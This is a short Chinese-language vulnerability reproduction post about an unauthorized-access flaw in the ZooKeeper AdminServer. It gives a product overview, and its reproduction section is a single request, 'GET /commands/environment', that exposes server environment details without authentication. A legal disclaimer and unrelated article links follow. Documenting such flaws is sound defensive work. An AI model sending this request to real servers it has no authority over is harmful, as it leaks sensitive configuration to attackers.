【漏洞复现】zookeeper AdminServer 未授权访问漏洞

0x01 产品简介

ZooKeeper 是一个集中式服务,用于维护配置信息、命名、提供分布式同步和提供组服务。ZooKeeper的AdminServer是其管理界面的一部分,通常用于监控ZooKeeper集群的状态和执行一些管理操作。AdminServer提供了Web-based的管理和监控功能,使得管理员能够方便地查看集群的健康状态、配置信息、以及执行一些管理任务。

0x02 漏洞概述

ZooKeeper AdminServer 存在未授权访问漏洞,未授权的攻击者可以通过该漏洞获取服务器大量敏感信息。

0x03 测绘语句

复制代码
N/A

0x04 漏洞复现

复制代码
GET /commands/environment HTTP/1.1

0x05 影响范围

复制代码
ZooKeeper AdminServer

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
Jerry952706282 分钟前
1.什么式可用性
java·分布式·后端·架构·高可用·秒杀
m0_569531011 小时前
K8S入门了解
云原生·容器·kubernetes
一周困⁸天.2 小时前
k8s-持久化存储
云原生·容器·kubernetes
奔跑中的小象2 小时前
统信UOS V2500 环境下K8S 环境部署
云原生·容器·kubernetes·uos
醉风塘3 小时前
RabbitMQ状态与配置深度解读:构建高性能消息中间件的关键指标
分布式·rabbitmq
运维李哥不背锅3 小时前
Kubernetes节点维护实战及注意事项
云原生·容器·kubernetes
阿里云云原生3 小时前
一行代码实现智能异常检测:UModel PaaS API 架构设计与最佳实践
云原生
赵得C3 小时前
软件设计师前沿考点精讲:新兴技术与性能优化实战
java·开发语言·分布式·算法·设计模式·性能优化
摇滚侠3 小时前
分布式锁,etcd,redis,ZooKeeper
redis·分布式·etcd
2301_801387293 小时前
devOps项目问题总结
云原生·容器·kubernetes